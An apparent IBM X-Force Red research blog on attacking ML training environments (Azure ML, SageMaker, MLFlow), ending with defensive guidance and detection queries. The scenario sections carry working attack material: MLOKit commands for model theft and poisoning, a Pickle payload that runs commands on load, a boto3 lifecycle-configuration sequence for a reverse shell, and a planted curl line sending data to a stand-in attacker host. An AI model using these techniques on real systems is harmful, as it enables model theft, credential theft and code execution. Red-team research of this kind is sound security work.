Adversary Simulation
IBM X-Force Red
Artificial intelligence (AI) is quickly becoming a strategic investment for companies of all sizes and industries, such as automotive, healthcare and financial services. To fulfill this rapidly developing business need, machine learning (ML) models need to be developed and deployed to support these AI-integrated products and services via the machine learning operations (MLOps) lifecycle. The most critical phase within the MLOps lifecycle is when the model is being trained within an ML training environment. If an attacker were to gain unauthorized access to any components within the ML training environment, this could affect the confidentiality, integrity and availability of the models being developed.
This research provides background on ML training environments and infrastructure and details attack scenarios against their critical components, such as Jupyter notebook environments, cloud compute, model artifact storage and model registries. This blog will outline how to take advantage of the integrations between these components to facilitate privilege escalation and lateral movement, as well as how to conduct ML model theft and poisoning. In addition to these attack scenarios, this blog will describe how to protect and defend ML training environments.
Prior work
The resources below are prior work related to this research, along with a description of how this X-Force Red research differs from or builds upon each.
Model theft and training data theft from MLOps platforms
Chris Thompson and I (Brett Hawkins) released a whitepaper in January 2025 that included how to perform model and training data theft against Azure ML, BigML and Vertex AI model registries. This new X-Force Red research differs in that it focuses on model theft attacks against Amazon SageMaker and MLFlow, along with how to conduct lateral movement and abuse the integrations between the different infrastructure components involved in ML training environments. Additionally, it includes new research on conducting model poisoning attacks against Azure ML and Amazon SageMaker to gain code execution, along with updates to the X-Force Red MLOKit tool to automate these attacks.
Abuse of SageMaker notebook lifecycle configurations
Or Azarzar released a blog post showing how to abuse SageMaker notebook instance lifecycle configurations to obtain a reverse shell within a SageMaker cloud compute instance. Or’s research covered how to conduct this attack using the AWS web interface. This new X-Force Red research details how to conduct the same attack in an automated fashion via a new module in the X-Force Red MLOKit tool.
Machine learning technology use cases
Machine learning (ML) is used in multiple industries as part of key business products and service offerings. Example use cases for various industries are listed below:
Automotive industry
Healthcare industry
Financial services industry
To develop and deploy ML models that are utilized by the ML technologies previously mentioned, the Machine Learning Operations (MLOps) lifecycle is used. MLOps is the practice of deploying and maintaining ML models in a secure, efficient and reliable way. The goal of MLOps is to provide a consistent and automated process to be able to rapidly get an ML model into production for use by ML technologies.
An MLOps lifecycle exists for an ML model to go from design all the way to deployment. For a list of popular open source and commercial MLOps platforms, see this resource. In this research, we will focus on attacking and protecting the ML training environment that is involved in the “Develop/Build” phase of the MLOps lifecycle.
The attack scenarios that will be shown in this research against ML training environments rely on obtaining valid credential material. Common methods for obtaining the credential material required to access ML training environments include, but are not limited to, file shares, intranet sites (e.g., internal wikis), user workstations, public resources (e.g., GitHub), social engineering, public data breach leaks or unauthenticated access. Additionally, attackers will utilize various privilege escalation techniques within corporate networks to help facilitate the retrieval of credentials, such as escalating privileges in Active Directory or cloud environments.
ML training environment infrastructure
There are several key pieces of infrastructure involved in an ML training environment. These include:
Some of the specific infrastructure components that will be shown or mentioned in this research are listed below.
Attacking ML training environments
Key components: Attacker perspective
There are several components within ML training environments that can be targeted by an attacker. These components are highly privileged and can provide an attacker with sensitive access that would facilitate lateral movement, privilege escalation, and training data and model theft or manipulation.
Several attack scenarios involving ML training environments are detailed below. These scenarios have been performed by me and others on our team as part of Adversary Simulation engagements for our clients.
Scenario 1: Azure ML - Credential theft from Jupyter notebook
In this attack scenario, an attacker has gained initial access to an organization via a phishing attack and escalated their privileges within the Active Directory environment. Using their elevated privileges, the attacker has performed lateral movement to a data scientist workstation and obtained the data scientist's Azure ML credentials from the workstation.
After obtaining initial access, the compromised data scientist credentials can be used to log in to Azure ML, where there is a Jupyter notebook available and configured to send ML training model artifacts to MLFlow.
In this case, the data scientist has MLFlow credentials present in cleartext within the Jupyter notebook, where they can be stolen directly.
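For illustration, the hypothetical notebook cell below shows the kind of cleartext MLFlow configuration commonly found in data science notebooks. The tracking URL, username and password are made up, but credentials embedded this way can be read by anyone with access to the notebook.

# Hypothetical Jupyter notebook cell containing cleartext MLFlow credentials
import os
import mlflow

os.environ["MLFLOW_TRACKING_USERNAME"] = "mlflow-svc"   # cleartext username
os.environ["MLFLOW_TRACKING_PASSWORD"] = "Summer2025!"  # cleartext password
mlflow.set_tracking_uri("https://mlflow.internal.example.com")

mlflow.set_experiment("fraud-detection")
with mlflow.start_run():
    mlflow.log_param("epochs", 10)
    # ... training code that logs model artifacts to MLFlow ...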
These MLFlow credentials from the Jupyter notebook can then be used to gain initial access to the MLFlow tracking server.
Scenario 2: MLFlow - Model theft from model registry
After gaining initial access to an MLFlow tracking server, as shown in the previous attack scenario, the MLFlow REST API can be abused to perform model theft from the MLFlow model registry. This can also be conducted in an automated fashion using MLOKit. First, reconnaissance of the available models within the MLFlow model registry can be conducted using the command below.
MLOKit.exe list-models /platform:mlflow /credential:username;password /url:[MLFLOW_URL]
Then, a given model can be downloaded from the model registry by its model ID (the model name in this case). This will download all associated model artifacts for the model.
MLOKit.exe download-model /platform:mlflow /credential:username;password /url:[MLFLOW_URL] /model-id:[MODEL_ID]
This demonstrates performing model theft from an MLFlow model registry after stealing credentials from a Jupyter notebook within Azure ML.
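For context, the same MLFlow REST API endpoints abused by MLOKit are also exposed through the official MLFlow Python client. The minimal sketch below performs equivalent model reconnaissance and artifact download; the stolen credentials, tracking URL and model name are hypothetical.

# Minimal sketch of equivalent model recon and theft using the MLFlow Python client.
# Credentials, tracking URL and model name are hypothetical.
import os
import mlflow
from mlflow.tracking import MlflowClient

os.environ["MLFLOW_TRACKING_USERNAME"] = "stolen-username"
os.environ["MLFLOW_TRACKING_PASSWORD"] = "stolen-password"
mlflow.set_tracking_uri("https://mlflow.internal.example.com")

client = MlflowClient()

# Reconnaissance: enumerate registered models in the model registry
for registered_model in client.search_registered_models():
    print(registered_model.name)

# Theft: download all artifacts for the latest version of a chosen model
version = client.get_latest_versions("fraud-detection-model")[0]
mlflow.artifacts.download_artifacts(artifact_uri=version.source, dst_path="./stolen-model")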
If model artifacts are stolen, an attacker can take advantage of these artifacts in the following ways:
Scenario 3: SageMaker - Code execution via malicious code in source control
In this attack scenario, an attacker has gained initial access to an organization via a phishing attack. From there, the attacker has performed internal reconnaissance and discovered a personal access token (PAT) for the organization’s Azure DevOps instance on a file share.
A stolen PAT for Azure DevOps can be used to perform reconnaissance of the available repositories and search for repositories that have MLFlow project files. This can be conducted with a tool such as ADOKit.
ADOKit.exe searchfile /credential:PAT /url:https://dev.azure.com/organizationName /search:MLproject
After a repository is discovered, it can be cloned using the stolen PAT.
The code within one of the MLFlow project files in one of the repositories can be modified to provide a reverse shell when executed within the ML training environment, which is SageMaker in this instance. As an alternative to modifying the MLProject file, any script file can be modified, such as a Python script.
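As a hypothetical illustration of this modification, the sketch below shows a training entry point script with a single attacker-inserted line. The script name, training code and placeholder command (standing in for a reverse shell) are assumptions, not taken from a real engagement.

# Hypothetical train.py entry point referenced by the repository's MLproject file.
# The single inserted line is the type of modification described above; the command
# is a harmless placeholder standing in for a reverse shell.
import os
import mlflow

os.system("curl -s https://attacker.example.com/beacon/$(whoami)")  # attacker-inserted line (placeholder)

def train():
    with mlflow.start_run():
        mlflow.log_param("learning_rate", 0.01)
        # ... legitimate training code continues unchanged ...

if __name__ == "__main__":
    train()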
It is common for automation to be set up in an MLOps training environment to pull updated code from the affected SCM repository and run it. Another option could be MLOps personnel pulling in code changes on an ad-hoc or regularly scheduled basis. In either of these scenarios, the updated MLProject file would be pulled in and run malicious commands, as demonstrated below.
This causes the reverse shell command to be run on the SageMaker compute instance, which provides direct access to the system.
While on the cloud compute system, sensitive credentials can be obtained via environment variables, which frequently include credentials for other ML training infrastructure, such as an MLFlow tracking server or enterprise data lakes. Other data that may be present on the SageMaker compute instance includes third-party API credentials or even training data.
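A minimal sketch of that post-exploitation step is below: it simply prints environment variables whose names suggest credential material. The keyword list is illustrative, not exhaustive.

# Minimal sketch: enumerate environment variables that may hold credentials.
import os

KEYWORDS = ("KEY", "SECRET", "TOKEN", "PASSWORD", "MLFLOW")
for name, value in os.environ.items():
    if any(keyword in name.upper() for keyword in KEYWORDS):
        print(f"{name}={value}")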
Scenario 4: SageMaker - Lateral movement to cloud compute using malicious lifecycle configuration
This example scenario starts with an attacker discovering AWS security credentials within a public GitHub account for an organization. From there, MLOKit can be used to access the organization’s AWS environment using the stolen credentials. To perform this attack, the stolen AWS security credentials need the permissions granted by the AmazonSageMakerFullAccess AWS managed policy, meaning administrative access to SageMaker. These are the minimum privileges required.
The MLOKit command below can be run to list all notebook instances available within SageMaker.
MLOKit.exe list-notebooks /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /region:[REGION]
After identifying a notebook instance where code execution is desired, the command below can be run. This will stop the target notebook, create a lifecycle configuration based on the script you provide, assign the lifecycle configuration to the target notebook and finally restart the target notebook. The bash script file in this instance is a reverse shell.
MLOKit.exe add-notebook-trigger /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /notebook-name:[NOTEBOOK_NAME] /script:[PATH_TO_SCRIPT] /region:[REGION]
Upon the target notebook instance starting, it will load the malicious lifecycle configuration, which provides a reverse shell to the SageMaker cloud compute instance as the root user account.
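For reference, the stop/create/assign/restart sequence that the add-notebook-trigger module automates can also be reproduced directly against the SageMaker API. The boto3 sketch below is a minimal illustration under the assumption of valid AWS credentials; the notebook name, lifecycle configuration name and script path are hypothetical. This is the same API call sequence flagged by the CloudTrail detection query later in this post.

# Minimal boto3 sketch of the stop/create/assign/restart sequence described above.
# Notebook name, config name and script path are hypothetical; valid AWS credentials
# for the target account are assumed.
import base64
import boto3

sagemaker = boto3.client("sagemaker", region_name="us-east-1")
notebook = "ml-training-notebook"        # hypothetical target notebook instance
config_name = "maintenance-config"       # hypothetical lifecycle configuration name

with open("onstart.sh", "rb") as script:  # script to run on start (reverse shell in this scenario)
    content = base64.b64encode(script.read()).decode()

sagemaker.stop_notebook_instance(NotebookInstanceName=notebook)
sagemaker.get_waiter("notebook_instance_stopped").wait(NotebookInstanceName=notebook)

sagemaker.create_notebook_instance_lifecycle_config(
    NotebookInstanceLifecycleConfigName=config_name,
    OnStart=[{"Content": content}],
)
sagemaker.update_notebook_instance(NotebookInstanceName=notebook, LifecycleConfigName=config_name)
sagemaker.get_waiter("notebook_instance_stopped").wait(NotebookInstanceName=notebook)
sagemaker.start_notebook_instance(NotebookInstanceName=notebook)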
As mentioned in the previous attack path, access to SageMaker cloud compute can facilitate the discovery of sensitive credentials via environment variables and script files, or proprietary ML training code and data.
Scenario 5: SageMaker - Model theft from model registry
This example scenario starts with an attacker discovering AWS security credentials within a public GitLab account for an organization. To perform this attack, the stolen AWS security credentials need the permissions granted by the AmazonS3ReadOnlyAccess and AmazonSageMakerReadOnly AWS managed policies, meaning read-only access to S3 and SageMaker. These are the minimum privileges required.
MLOKit can be used to list all models that are available within the SageMaker model registry after authenticating with the stolen AWS security credentials.
MLOKit.exe list-models /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /region:[REGION]
Supply a model name from the previous MLOKit command as the /model-id: argument. This will locate and download all model artifacts for the registered model.
MLOKit.exe download-model /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /model-id:[MODEL_ID] /region:[REGION]
At this point, all model artifacts have been downloaded and can be extracted locally.
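The equivalent reconnaissance-and-download flow can also be expressed directly against the SageMaker and S3 APIs. The boto3 sketch below is a minimal illustration; the region, model name and output path are hypothetical, and it assumes the model artifact location is exposed via the model's primary container definition.

# Minimal boto3 sketch of model reconnaissance and theft. Region, model name and
# output path are hypothetical; read-only SageMaker and S3 access is assumed.
import boto3
from urllib.parse import urlparse

region = "us-east-1"
sagemaker = boto3.client("sagemaker", region_name=region)
s3 = boto3.client("s3", region_name=region)

# Reconnaissance: enumerate models (generates ListModels events in CloudTrail)
for model in sagemaker.list_models()["Models"]:
    print(model["ModelName"])

# Theft: resolve a model's artifact location and download it (DescribeModel + GetObject)
details = sagemaker.describe_model(ModelName="fraud-detection-model")  # hypothetical model name
artifact_url = details["PrimaryContainer"]["ModelDataUrl"]  # e.g., s3://bucket/path/model.tar.gz
parsed = urlparse(artifact_url)
s3.download_file(parsed.netloc, parsed.path.lstrip("/"), "model.tar.gz")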
Scenario 6: SageMaker - Model poisoning to gain code execution
In this scenario, we will be poisoning the previously stolen model from SageMaker. To perform this attack, the compromised AWS security credentials need the permissions granted by the AmazonS3FullAccess and AmazonSageMakerReadOnly AWS managed policies, meaning read/write access to S3 and read-only access to SageMaker. These are the minimum privileges required.
After extracting the model artifacts, look for any serialized model formats that support code execution upon loading. In this example, the stolen model uses a Pickle-based format, so we take note of one of the model.pkl files. The model.pkl file will be the file that is poisoned to include a malicious command, such as a reverse shell.
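The proof-of-concept sketch below illustrates the Pickle poisoning step referenced in the next paragraph. It replaces model.pkl with an object whose __reduce__ method executes a command when the file is deserialized; the file path and command are placeholders, with the command standing in for a reverse shell.

# Proof-of-concept sketch: replace model.pkl with a Pickle payload that executes a
# command when the model is loaded. The path and command are placeholders; in the
# scenario above, the command would be a reverse shell.
import os
import pickle

class MaliciousModel:
    def __reduce__(self):
        # Runs when the pickle is deserialized (i.e., when the model is loaded)
        return (os.system, ("id > /tmp/poc.txt",))

with open("model.pkl", "wb") as model_file:  # path to the extracted model artifact
    pickle.dump(MaliciousModel(), model_file)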
To poison the serialized model file (model.pkl), a Python code snippet such as the sketch above can be used. An alternative approach is appending the reverse shell to the existing model rather than completely replacing it. This is just a simple proof of concept. When conducting this attack as part of a security assessment, it is recommended to perform it in a non-production environment to reduce business impact while still testing security controls against the poisoning of models within SageMaker. Other tools that can be used to create malicious model files include:
After adding the malicious reverse shell code to the model.pkl file, MLOKit can be used to upload the poisoned model to the associated model artifact location for a given registered model. First, the poisoned model needs to be packaged up. The 7-zip command below is an example of packaging the poisoned model into a file named model.tar.gz.
"C:\Program Files\7-Zip\7z.exe" a -ttar -so model.tar * | "C:\Program Files\7-Zip\7z.exe" a -si model.tar.gzAfter packaging the poisoned model, it can be uploaded to the appropriate model artifact location via MLOKit.
MLOKit.exe poison-model /platform:sagemaker /credential:[ACCESS_KEY;SECRET_KEY] /model-id:[MODEL_ID] /source-dir:[SOURCE_FILES_PATH] /region:[REGION]
Once this model is deployed within either a training or production environment, the poisoned model will run the reverse shell code, providing an interactive command shell on the model deployment endpoint.
Scenario 7: Azure ML - Model poisoning to gain code execution
This example attack scenario starts with an attacker performing a device code phishing attack against a data scientist. This allows the attacker to obtain an Azure access token as the targeted data scientist user.
With an Azure access token, the Azure ML REST API can be accessed using MLOKit.
MLOKit.exe check /platform:azureml /credential:[ACCESS_TOKEN]
From there, all the available workspaces can be listed for each Azure subscription.
MLOKit.exe list-projects /platform:azureml /subscription-id:[SUBSCRIPTION_ID] /credential:[ACCESS_TOKEN]
After performing workspace reconnaissance, models within each workspace can be listed.
MLOKit.exe list-models /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME]
After performing model reconnaissance, a model can be downloaded from Azure ML using MLOKit by supplying the model ID from the output of the previous command. Within the directory created when downloading the model, take note of any serialized model file formats that support code execution upon load. In this case, the registered model uses a Pickle-based format. The model.pkl file will be the file that is poisoned to include a malicious command, such as a reverse shell.
MLOKit.exe download-model /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME] /model-id:[MODEL_ID]
To poison the serialized model file (model.pkl), the same Python code snippet shown in the SageMaker scenario can be used; it adds a reverse shell to the model.pkl file and then replaces the existing model file. An alternative approach is appending the reverse shell to the existing model rather than completely replacing it. This is just a simple proof of concept. When conducting this attack as part of a security assessment, it is recommended to perform it in a non-production environment to reduce business impact while still testing security controls against the poisoning of models within Azure ML.
After adding the malicious reverse shell code to the model.pkl file, MLOKit can be used to upload the poisoned model artifacts to the associated datastore for the model.
MLOKit.exe poison-model /platform:azureml /credential:[ACCESS_TOKEN] /subscription-id:[SUBSCRIPTION_ID] /region:[REGION] /resource-group:[RESOURCE_GROUP] /workspace:[WORKSPACE_NAME] /model-id:[MODEL_ID] /source-dir:[SOURCE_DIRECTORY]
Once this model is deployed within either a training or production environment, the poisoned model will run the reverse shell code, providing interactive command shell access to the Azure ML deployment endpoint.
If an attacker compromises an Azure ML deployment endpoint, this access can be used for:
Defensive guidance is outlined below to help protect your ML training environment with regard to users, Jupyter notebook environments, cloud compute instances, model artifact storage and model registries.
ML training environment users
Personnel who interact with ML training environments should be classified as business-critical personnel with highly sensitive access. As such, their access should be secured as rigorously as that of any other sensitive user, such as a database administrator or Active Directory administrator.
Below are a couple of guides on securing your Jupyter notebook environment.
A summary of the guidance from the above resources is:
Regardless of your cloud provider, you should consider the below items when configuring your compute instances.
Below is high-level guidance for protecting your model artifact storage and registry:
I have developed KQL queries and CloudTrail queries that can be used to detect the attack scenarios shown in this research against Azure ML and SageMaker, respectively. For MLFlow, I supply filters that can be applied to the gunicorn logs. The below resources can be referenced for configuration guidance of these platforms.
The KQL query below queries the Azure storage blob logs and the Azure ML model and datastore events, and then joins events from these tables by subscription ID and resource group. The specific operations the query looks for across these log schemas are:
This can be indicative of a compromised account being used to download and then replace model artifacts.
The image below shows the results of the KQL query, which includes the compromised user account, model artifacts that were replaced, and the name of the model and datastore the model artifacts were associated with.
Amazon SageMaker – Model theft
The query below can be used to identify model reconnaissance and theft activities. This query will identify where any userIdentity.arn and sourceIpAddress has performed the ListModels, DescribeModel, GetObject and GetBucketVersioning events within a 24-hour period. This can be indicative of an attacker using a compromised account to list all models within SageMaker and then choosing to download one.
The image below shows the results from the query that successfully identifies the model theft attack by the compromised data-scientist user account.
Amazon SageMaker – Model poisoning
The query below can be used to identify potential model poisoning activities within SageMaker. This query will identify any userIdentity.arn and sourceIpAddress that performed the ListModels, DescribeModel, GetObject, PutObject and GetBucketVersioning events within a 24-hour period. This can be indicative of an attacker using a compromised account to list all models within SageMaker, download a model, and then upload a new model by replacing model artifacts.
The image below shows the results from the query that successfully identifies the model poisoning attack by the compromised data-scientist user account.
Amazon SageMaker – Malicious lifecycle configuration
The query below can be used to identify potential abuse of a malicious lifecycle configuration. This query will identify any userIdentity.arn and sourceIpAddress that performed the ListNotebookInstances, UpdateNotebookInstance, CreateNotebookInstanceLifecycleConfig, StopNotebookInstance and StartNotebookInstance events within a 24-hour period. This can be indicative of an attacker creating a malicious lifecycle configuration to be assigned to a SageMaker notebook instance.
SageMakerMaliciousLifecycleConfig.sql
The image below shows the results from the query that successfully identifies the abuse of a notebook lifecycle config by the compromised data-scientist user account.
MLFlow
To ensure proper logging of MLFlow REST API abuse, add the additional options below when starting your MLFlow tracking server.
--gunicorn-opts "--log-level info --access-logfile access.log --error-logfile error.log --capture-output --enable-stdio-inheritance"
Ensure these logs are being sent to a centralized Security Information and Event Management (SIEM) system where they can be correlated to detect anomalous behavior. Once proper logging is in place, the search strings below can be used to correlate REST API actions with potential misuse.
MLOKit Usage
grep -i mlokit access.log
Model Recon
grep -i /api/2.0/mlflow/model-versions/search access.log
Model Theft
grep -i /get-artifact access.log
ML training environments are quickly becoming populated with highly sensitive and business-critical data, which will be targeted by attackers. As security practitioners, it is vital that we understand these environments and systems so we can protect them. If access to these ML training environments falls into the wrong hands, there can be a significant impact on the businesses and consumers that depend on the products and services that use the models developed in these environments. It is X-Force Red’s goal that this research brings more attention to and inspires future research on defending these ML training environments.
A special thank you to the below people for giving feedback on this research and providing blog post content review: